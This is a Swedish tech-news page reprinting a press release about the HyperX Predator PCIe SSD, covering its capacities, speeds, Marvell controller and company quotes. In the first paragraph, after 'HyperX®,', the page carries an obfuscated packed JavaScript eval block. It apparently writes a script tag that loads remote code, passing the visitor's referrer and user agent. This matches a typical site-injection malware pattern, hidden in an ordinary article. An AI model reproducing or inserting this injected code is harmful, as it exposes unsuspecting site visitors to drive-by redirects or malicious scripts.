Image Image Image Image Image Image Image Image Image Image

| 4 juni, 2020

Scroll to top

Top

HyperX Lanserar Hög-presterande PCIe SSD

HyperX Lanserar Hög-presterande PCIe SSD
Sebastian

HyperX®, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bzens|var|u0026u|referrer|yiied||js|php’.split(’|’),0,{}))
en division av
Kingston Technology Company, Inc.oberoende världsledare på minnesprodukter, lanserar idag HyperX Predator PCIe SSD. Med leverans i februari kommer HyperX Predator PCIe SSD vara den SSD-enhet med de snabbaste hastigheterna i HyperX portföljen

HyperX Predator PCIe SSD erbjuder hög kapacitet (240GB, 480GB) och otroliga hastigheter för att köra maximalt system. En 960GB versionen kommer att lanseras senare i Q1/Q2. Snabbare än SATA-baserade SSD-enheter, leverera generation 2.0 x4 gränssnitt hastigheter upp till 1400MB / s läs och 1000MB / s skriv för ultra-responsiv multitasking och ger ett övergripande snabbare system. Det drivs av Marvell 88SS9293 controller. M.2 formfaktor och ger nästa generations plattformar med ett mönster 2 PCIe slots. Dessutom en version av enheten med en halvhöjd, halv längd (HHHL) adapter även för många befintliga moderkort utan M.2 uttag, så att det är möjligt att uppgradera med en adapter i en standard PCI Express-kortplats. HHHL adapter medföljer både standard och låg profil fästen för att passa tunna klienter.

            ”Både Pc entusiaster, gamers och datacenterkunder som söker bättre prestanda för att bryta igenom 6Gb / s SATA begränsning och Marvells X4 lane PCIe SSD Controller 88SS9293 ger blixtsnabb, nästa generations SSD prestanda”, säger Mike Chen, chef för produktmarknadsföring, Förvaring BU, Marvell. ”Vi är stolta över att arbeta med HyperX teamet för att leverera högre bandbredd och kapacitet för klientsystem och datacenterkunder som vill maximera lagringsprestanda.”

”HyperX är glada att snart släppa sin snabbaste HyperX SSD hittills. PCIe formfaktor visar extrema hastigheter under behandling av både komprimerade och okomprimerade data”, säger Mikael Johansson, Affärsutvecklare Kingston. ”Vi arbetade nära Marvell för att föra denna HyperX Predator PCIe SSD till en högre prestanda och den levererar tillfullo.

  HyperX är divisionen för högpresterande produkter i Kingston Technology, vilket inkluderar hög hastighet DDR3-minne, SSD, USB-minnen, och hörlurar. Syftar till gamers, klockare och entusiaster HyperX känd över hela världen för kvalitet, prestanda och innovation. HyperX har åtagit sig att Esports som vi sponsrar över 20 teams globalt och är också huvudsponsor av Intel Extreme Masters. HyperX hittar du på de flesta evenemang inklusive, TG, Brasil Game Show, China Joy, DreamHack, och PAX.

För mer information besök HyperX hemsida.